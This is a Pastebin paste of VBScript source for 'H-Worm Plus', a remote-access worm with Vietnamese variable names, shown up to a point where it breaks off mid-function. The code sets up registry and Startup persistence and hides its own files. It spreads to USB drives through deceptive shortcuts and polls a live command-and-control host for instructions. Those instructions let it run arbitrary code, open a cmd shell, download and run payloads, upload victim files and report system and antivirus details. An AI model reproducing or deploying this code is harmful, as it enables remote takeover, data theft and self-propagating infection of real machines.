API tools faq
paste
Racco42

Untitled

Racco42
Aug 24th, 2018
1,664
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 25.18 KB | None | 0 0
raw download clone embed print report
  1. "'<[ >> H-Worm Plus | ReNEW version by MeoIT << ]>
  2. '   <[ Add Functions and fixed some place ]>
  3. '<[ >> CREDIT and THANKS: njQ8, Houdini and me :) << ]>
  4. SET_THUMUC_CAIDAT_SAU = "%appdata%"
  5. dim OBJ_WS_SHELL
  6. set OBJ_WS_SHELL = wscript.createobject("wscript.shell")
  7. dim OBJ_HE_THONG_TAPTIN
  8. set OBJ_HE_THONG_TAPTIN = createobject("scripting.filesystemobject")
  9. dim MANG_CUA_TUI
  10. set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
  11. TEN_SAU_CAI_DAT = wscript.scriptname
  12. DUONG_DAN_SSTTAARRTTUUPP = OBJ_WS_SHELL.specialfolders ("startup") & "\"
  13. THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings(SET_THUMUC_CAIDAT_SAU) & "\"
  14. dim OBJ_SYS_ENV,OBJ_USER_ENV
  15. dim STR_DUONG_DAN_USER_TEMP
  16. dim STR_DUONG_DAN_SYS_TEMP
  17. dim STR_USER_PROFILE,STR_THU_MUC_FILE_TAM_IE
  18. set OBJ_SYS_ENV = OBJ_WS_SHELL.Environment("System")
  19. set OBJ_USER_ENV = OBJ_WS_SHELL.Environment("User")
  20. STR_DUONG_DAN_USER_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
  21. STR_DUONG_DAN_SYS_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
  22. STR_USER_PROFILE = OBJ_WS_SHELL.ExpandEnvironmentStrings("%userprofile%")
  23. if not OBJ_HE_THONG_TAPTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings("%temp%") & "\"
  24. BO_CHIA_KY_TU = "<|>"
  25. THOI_GIAN_NGU = 4915
  26. dim KET_NOI_DA_SAN_SANG
  27. dim LENH_THUC_THI
  28. dim THONG_SO_CHO_LENH_THUC_THI
  29. CO_HAY_KHONG_TU_USB = ""
  30. dim LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT
  31. startdate = ""
  32. info = ""
  33. DIA_CHI_IP_KET_NOI = "shkis.publicvm.com"
  34. CONG_KET_NOI = 83
  35. BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB = false
  36. BAT_TAT_LAY_LAN_LINK_THU_MUC_USB = false
  37. on error resume next
  38. BAT_DAU_CHAY_HAM
  39. while true
  40. CHONG_CAC_PROC
  41. CAI_DAT_VAO_USB_THU_MUC_USB
  42. KET_NOI_DA_SAN_SANG = ""
  43. KET_NOI_DA_SAN_SANG = THANK_GOD_YOU_ARE_HERE("is-ready","")
  44. LENH_THUC_THI = split(KET_NOI_DA_SAN_SANG,BO_CHIA_KY_TU)
  45. select case LENH_THUC_THI(0)
  46. Case "excecute"
  47. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  48. execute THONG_SO_CHO_LENH_THUC_THI
  49. case "update"
  50. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  51. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
  52. set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,2,false,-1)
  53. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.write THONG_SO_CHO_LENH_THUC_THI
  54. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
  55. OBJ_WS_SHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chr(34)
  56. wscript.quit
  57. Case "uninstall"
  58. GO_BO_SUB
  59. case "send"
  60. DUA_FILE_LEN_VIC_ROI_CHAY_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
  61. Case "site-send"
  62. LAY_FILE_THEO_URL_VA_THUC_THI_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
  63. case "recv"
  64. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  65. LAY_FILE_VE_NHA_QUANLYFILE_HAM (THONG_SO_CHO_LENH_THUC_THI)
  66. Case "enum-driver"
  67. THANK_GOD_YOU_ARE_HERE "is-enum-driver",LAY_THONG_TIN_CAC_O_DIA_HAM
  68. case "enum-faf"
  69. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  70. THANK_GOD_YOU_ARE_HERE "is-enum-faf",LAY_THONG_TIN_THU_MUC_HAM(THONG_SO_CHO_LENH_THUC_THI)
  71. Case "enum-process"
  72. THANK_GOD_YOU_ARE_HERE "is-enum-process",LAY_TTIN_CAC_TIEN_TRINH_HAM
  73. case "cmd-shell"
  74. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  75. THANK_GOD_YOU_ARE_HERE "is-cmd-shell",DIEU_KHIEN_CMD_HAM(THONG_SO_CHO_LENH_THUC_THI)
  76. Case "delete"
  77. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  78. XOA_TAP_TIN_VA_THU_MUC_SUB (THONG_SO_CHO_LENH_THUC_THI)
  79. case "exit-process"
  80. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  81. TAT_TIEN_TRINH_SUB (THONG_SO_CHO_LENH_THUC_THI)
  82. Case "sleep"
  83. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  84. THOI_GIAN_NGU = eval(THONG_SO_CHO_LENH_THUC_THI)
  85. end select
  86. wscript.sleep THOI_GIAN_NGU
  87. wend
  88. function BAT_DAU_CHAY_HAM
  89. on error resume next
  90. CO_HAY_KHONG_TU_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\")
  91. if CO_HAY_KHONG_TU_USB = "" then
  92. if lcase(mid(wscript.scriptfullname,2)) = ":\" & lcase(TEN_SAU_CAI_DAT) then
  93. CO_HAY_KHONG_TU_USB = "true - " & date
  94. OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
  95. else
  96. CO_HAY_KHONG_TU_USB = "false - " & date
  97. OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
  98. end if
  99. end if
  100. CAI_DAT_VAO_MAY_SUB
  101. set RUT_GON_FNAME = OBJ_HE_THONG_TAPTIN.getfile(wscript.scriptfullname)
  102. set RUT_GON_FNAME_CAI = OBJ_HE_THONG_TAPTIN.getfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT)
  103. if lcase(RUT_GON_FNAME.shortpath) <> lcase(RUT_GON_FNAME_CAI.shortpath) then
  104. end if
  105. err.clear
  106. set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,8,false,-1)
  107. if err.number > 0 then wscript.quit
  108. end function
  109. sub CAI_DAT_VAO_MAY_SUB()
  110. on error resume next
  111. CHUOI_PC = "."
  112. set DT_WIN_MGR = GetObject("winmgmts:" _
  113. & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
  114. set TIEN_TRINH_KO_CAI_NOT_RUN = DT_WIN_MGR.ExecQuery _
  115. ("SELECT * FROM Win32_Process WHERE Name = " & _
  116. "'filemonitor.exe'")
  117. if TIEN_TRINH_KO_CAI_NOT_RUN.Count = 1 then
  118. wscript.quit
  119. end if
  120. OBJ_WS_SHELL.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
  121. OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B "  & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
  122. OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,true
  123. OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
  124. OBJ_HE_THONG_TAPTIN.GetFile(DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT).Attributes=2+4
  125. OBJ_HE_THONG_TAPTIN.GetFile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT).Attributes=2+4
  126. if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" Then
  127. OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  128. end if
  129. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_USER_TEMP
  130. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_SYS_TEMP
  131. STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  132. XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
  133. STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
  134. XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
  135. end sub
  136. sub CAI_DAT_VAO_USB_THU_MUC_USB
  137. on error resume next
  138. dim BO_TAO_LOI_TAT
  139. dim TEN_FILE_TRONG_USB
  140. dim TEN_THU_MUC_TRONG_USB
  141. dim BIEU_TUONG_LINK_FILE_TRONG_USB
  142. dim BIEU_TUONG_THU_MUC_TRONG_USB
  143. CAI_DAT_VAO_MAY_SUB
  144. for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
  145. if CAC_USB.isready = true then
  146. if CAC_USB.freespace > 0 then
  147. if CAC_USB.drivetype = 1 then
  148. OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname, CAC_USB.path & "\" & TEN_SAU_CAI_DAT,true
  149. if OBJ_HE_THONG_TAPTIN.fileexists(CAC_USB.path & "\" & TEN_SAU_CAI_DAT) then
  150. OBJ_HE_THONG_TAPTIN.getfile(CAC_USB.path & "\" & TEN_SAU_CAI_DAT).attributes = 2+4
  151. end if
  152. for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").Files
  153. if not BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB then exit for
  154. TAP_TIN_DA_CO_TRONG_USB.attributes=0
  155. if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
  156. if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".") (ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
  157. TAP_TIN_DA_CO_TRONG_USB.attributes = 2+4
  158. if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
  159. TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
  160. set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_TRONG_USB (0) & ".lnk")
  161. BO_TAO_LOI_TAT.windowstyle = 7
  162. BO_TAO_LOI_TAT.targetpath = "cmd.exe"
  163. BO_TAO_LOI_TAT.workingdirectory = ""
  164. BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAP_TIN_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  165. BIEU_TUONG_LINK_FILE_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\" & OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\." & split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))& "\") & "\defaulticon\")
  166. if instr(BIEU_TUONG_LINK_FILE_TRONG_USB,",") = 0 then
  167. BO_TAO_LOI_TAT.iconlocation = TAP_TIN_DA_CO_TRONG_USB.path
  168. else
  169. BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_LINK_FILE_TRONG_USB
  170. end if
  171. BO_TAO_LOI_TAT.save()
  172. end if
  173. end if
  174. end if
  175. next
  176. for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\" ).subfolders
  177. if not BAT_TAT_LAY_LAN_LINK_THU_MUC_USB then exit for
  178. THU_MUC_DA_CO_TRONG_USB.attributes = 2+4
  179. TEN_THU_MUC_TRONG_USB = THU_MUC_DA_CO_TRONG_USB.name
  180. set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_THU_MUC_TRONG_USB & ".lnk")
  181. BO_TAO_LOI_TAT.windowstyle = 7
  182. BO_TAO_LOI_TAT.targetpath = "cmd.exe"
  183. BO_TAO_LOI_TAT.workingdirectory = ""
  184. BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THU_MUC_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  185. BIEU_TUONG_THU_MUC_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  186. if instr(BIEU_TUONG_THU_MUC_TRONG_USB,",") = 0 then
  187. BO_TAO_LOI_TAT.iconlocation = THU_MUC_DA_CO_TRONG_USB.path
  188. else
  189. BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_THU_MUC_TRONG_USB
  190. end if
  191. BO_TAO_LOI_TAT.save()
  192. next
  193. end if
  194. end if
  195. end if
  196. next
  197. err.clear
  198. end sub
  199. sub GO_BO_SUB
  200. on error resume next
  201. dim TEN_FILE_TRONG_USB
  202. OBJ_HE_THONG_TAPTIN.GetFile(wscript.scriptfullname).Attributes=0
  203. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
  204. OBJ_WS_SHELL.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
  205. OBJ_WS_SHELL.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
  206. OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
  207. OBJ_HE_THONG_TAPTIN.deletefile THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT
  208. OBJ_HE_THONG_TAPTIN.deletefile wscript.scriptfullname,true
  209. if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" then
  210. OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  211. end if
  212. XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_USER_TEMP
  213. XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_SYS_TEMP
  214. STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  215. XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
  216. STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
  217. XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
  218. for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
  219. if CAC_USB.isready = true then
  220. if CAC_USB.freespace > 0 then
  221. if CAC_USB.drivetype = 1 then
  222. for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").files
  223. on error resume next
  224. if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
  225. if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
  226. TAP_TIN_DA_CO_TRONG_USB.attributes = 0
  227. if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
  228. TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
  229. OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_TRONG_USB(0) & ".lnk")
  230. else
  231. OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TAP_TIN_DA_CO_TRONG_USB.name)
  232. end if
  233. else
  234. OBJ_HE_THONG_TAPTIN.deletefile(TAP_TIN_DA_CO_TRONG_USB.path)
  235. end if
  236. end if
  237. OBJ_HE_THONG_TAPTIN.DeleteFile wscript.scriptfullname,true
  238. next
  239. for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").subfolders
  240. THU_MUC_DA_CO_TRONG_USB.attributes = 0
  241. next
  242. end if
  243. end if
  244. end if
  245. next
  246. wscript.quit
  247. end sub
  248. function THANK_GOD_YOU_ARE_HERE(LENH_THUC_THI,THONG_SO_CHO_LENH_THUC_THI)
  249. THANK_GOD_YOU_ARE_HERE = THONG_SO_CHO_LENH_THUC_THI
  250. MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/" & LENH_THUC_THI, false
  251. MANG_CUA_TUI.setrequestheader "user-agent:",HAM_TAP_HOP_CAC_INFOR
  252. MANG_CUA_TUI.send THONG_SO_CHO_LENH_THUC_THI
  253. THANK_GOD_YOU_ARE_HERE = MANG_CUA_TUI.responsetext
  254. end function
  255. sub LAY_FILE_THEO_URL_VA_THUC_THI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
  256. CHUOI_LIEN_KET = URL_CHUA_FILE
  257. CHUOI_DAT_FILE_VAO_DAU = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\" & TEN_FILE_GUI_URL
  258. set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
  259. OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIEN_KET, false
  260. OBJ_LAY_FILE_URL_VA_CHAY.send
  261. set OBJ_HE_THONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
  262. if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  263. OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
  264. end if
  265. if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
  266. dim ADO_TAI_URL_CHAY
  267. set ADO_TAI_URL_CHAY = createobject("adodb.stream")
  268. with ADO_TAI_URL_CHAY
  269. .type = 1
  270. .open
  271. .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
  272. .savetofile CHUOI_DAT_FILE_VAO_DAU
  273. .close
  274. end with
  275. set ADO_TAI_URL_CHAY = nothing
  276. end if
  277. if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  278. OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
  279. end if
  280. end sub
  281. sub DUA_FILE_LEN_VIC_ROI_CHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
  282. if THU_MUC_VIC_NHAN = "" then
  283. THU_MUC_VIC_NHAN = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\"
  284. end if
  285. CHUOI_DAT_FILE_VAO_DAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
  286. set OBJ_DUA_FILE_LEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
  287. OBJ_DUA_FILE_LEN_VIC_VA_CHAY.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-sending" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
  288. OBJ_DUA_FILE_LEN_VIC_VA_CHAY.send ""
  289. set OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN = createobject("scripting.filesystemobject")
  290. if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  291. OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
  292. end if
  293. if OBJ_DUA_FILE_LEN_VIC_VA_CHAY.status = 200 then
  294. dim ADO_TAI_DISKFILE_LEN_VA_CHAY
  295. set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
  296. with ADO_TAI_DISKFILE_LEN_VA_CHAY
  297. .type = 1
  298. .open
  299. .write OBJ_DUA_FILE_LEN_VIC_VA_CHAY.responsebody
  300. .savetofile CHUOI_DAT_FILE_VAO_DAU
  301. .close
  302. end with
  303. set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
  304. end if
  305. if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  306. OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
  307. end if
  308. end sub
  309. function LAY_FILE_VE_NHA_QUANLYFILE_HAM(URL_CHUA_FILE)
  310. dim MANG_CUA_TUI,ADO_LAY_FILE_VE_NHA,BO_DEM_BUF_LAY_FILE_VE_NHA
  311. set ADO_LAY_FILE_VE_NHA = createobject("adodb.stream")
  312. with ADO_LAY_FILE_VE_NHA
  313. .type = 1
  314. .open
  315. .loadfromfile URL_CHUA_FILE
  316. BO_DEM_BUF_LAY_FILE_VE_NHA = .read
  317. .close
  318. end with
  319. set ADO_LAY_FILE_VE_NHA = nothing
  320. set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
  321. MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-recving" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
  322. MANG_CUA_TUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
  323. end function
  324. function LAY_THONG_TIN_CAC_O_DIA_HAM()
  325. for each CAC_HDD_USB_DVD_CD in OBJ_HE_THONG_TAPTIN.drives
  326. if CAC_HDD_USB_DVD_CD.isready = true then
  327. LAY_THONG_TIN_CAC_O_DIA_HAM = LAY_THONG_TIN_CAC_O_DIA_HAM & CAC_HDD_USB_DVD_CD.path & "|" & CAC_HDD_USB_DVD_CD.drivetype & BO_CHIA_KY_TU
  328. end if
  329. next
  330. end function
  331. function LAY_THONG_TIN_THU_MUC_HAM(CAC_THU_MUC_GET_INF)
  332. LAY_THONG_TIN_THU_MUC_HAM = CAC_THU_MUC_GET_INF & BO_CHIA_KY_TU
  333. for each THU_MUC_DA_CO_TRONG_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).subfolders
  334. LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & THU_MUC_DA_CO_TRONG_MACHINE.name & "||d|" & THU_MUC_DA_CO_TRONG_MACHINE.attributes & BO_CHIA_KY_TU
  335. next
  336. for each TTIN_DA_CO_IN_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).files
  337. LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & TTIN_DA_CO_IN_MACHINE.name & "|" & TTIN_DA_CO_IN_MACHINE.size  & "|f|" & TTIN_DA_CO_IN_MACHINE.attributes & BO_CHIA_KY_TU
  338. next
  339. end function
  340. function LAY_TTIN_CAC_TIEN_TRINH_HAM()
  341. on error resume next
  342. set OBJ_WMI_SER_PROC = getobject("winmgmts:\\.\root\cimv2")
  343. set CAC_DT_THEO_COT_PROC = OBJ_WMI_SER_PROC.execquery("select * from win32_process",,48)
  344. dim DT_PROC
  345. for each DT_PROC in CAC_DT_THEO_COT_PROC
  346. LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.name & "|"
  347. LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.processid & "|"
  348. LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.executablepath & BO_CHIA_KY_TU
  349. next
  350. end function
  351. sub TAT_TIEN_TRINH_SUB(MA_SO_TIEN_TRINH)
  352. on error resume next
  353. OBJ_WS_SHELL.run "taskkill /F /T /PID " & MA_SO_TIEN_TRINH,7,true
  354. end sub
  355. sub XOA_TAP_TIN_VA_THU_MUC_SUB(DUONG_DAN_FILE_OR_THU_MUC)
  356. on error resume next
  357. OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_FILE_OR_THU_MUC,true
  358. OBJ_HE_THONG_TAPTIN.deletefolder DUONG_DAN_FILE_OR_THU_MUC,true
  359. end sub
  360. function DIEU_KHIEN_CMD_HAM(LENH_THUC_THI)
  361. dim MANG_CUA_TUI,OBJ_WS_SHELL_EXECU,DOC_DATA_SHELL_OUT
  362. set OBJ_WS_SHELL_EXECU = OBJ_WS_SHELL.exec("%comspec% /c " & LENH_THUC_THI)
  363. if not OBJ_WS_SHELL_EXECU.stdout.atendofstream then
  364. DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stdout.readall
  365. elseif not OBJ_WS_SHELL_EXECU.stderr.atendofstream then
  366. DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stderr.readall
  367. else
  368. DOC_DATA_SHELL_OUT = ""
  369. end if
  370. DIEU_KHIEN_CMD_HAM = DOC_DATA_SHELL_OUT
  371. end function
  372. function HAM_TAP_HOP_CAC_INFOR
  373. on error resume next
  374. if inf = "" then
  375. inf = HAM_LAY_TEN_VIC_THEO_MA_HW & BO_CHIA_KY_TU
  376. inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%computername%") & BO_CHIA_KY_TU
  377. inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%username%") & BO_CHIA_KY_TU
  378. set RT_INF = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  379. set HDH = RT_INF.execquery("select * from win32_operatingsystem")
  380. for each TEN_HDH in HDH
  381. inf = inf & TEN_HDH.caption & BO_CHIA_KY_TU
  382. exit for
  383. next
  384. inf = inf & "plus" & BO_CHIA_KY_TU
  385. inf = inf & HAM_LAY_TEN_TRINH_AV & BO_CHIA_KY_TU
  386. inf = inf & CO_HAY_KHONG_TU_USB
  387. HAM_TAP_HOP_CAC_INFOR = inf
  388. else
  389. HAM_TAP_HOP_CAC_INFOR = inf
  390. end if
  391. end function
  392. function HAM_LAY_TEN_VIC_THEO_MA_HW
  393. on error resume next
  394. if not OBJ_HE_THONG_TAPTIN.FolderExists(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe") then OBJ_HE_THONG_TAPTIN.CreateFolder(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe")
  395. set RT_TEN_MACHINE = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  396. set CAC_HDD = RT_TEN_MACHINE.execquery ("select * from win32_logicaldisk")
  397. for each O_DIA_CUNG_SSD in CAC_HDD
  398. if O_DIA_CUNG_SSD.volumeserialnumber <> "" then
  399. HAM_LAY_TEN_VIC_THEO_MA_HW = O_DIA_CUNG_SSD.volumeserialnumber & " | MeoIT"
  400. exit for
  401. end if
  402. next
  403. end function
  404. function HAM_LAY_TEN_TRINH_AV
  405. on error resume next
  406. HAM_LAY_TEN_TRINH_AV = ""
  407. set OBJ_WMI_HDH = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  408. set CAC_DT_THEO_COT_HDH = OBJ_WMI_HDH.execquery("select * from win32_operatingsystem",,48)
  409. for each DT_AV in CAC_DT_THEO_COT_HDH
  410. PHIEN_BAN_AV = split(DT_AV.version,".")
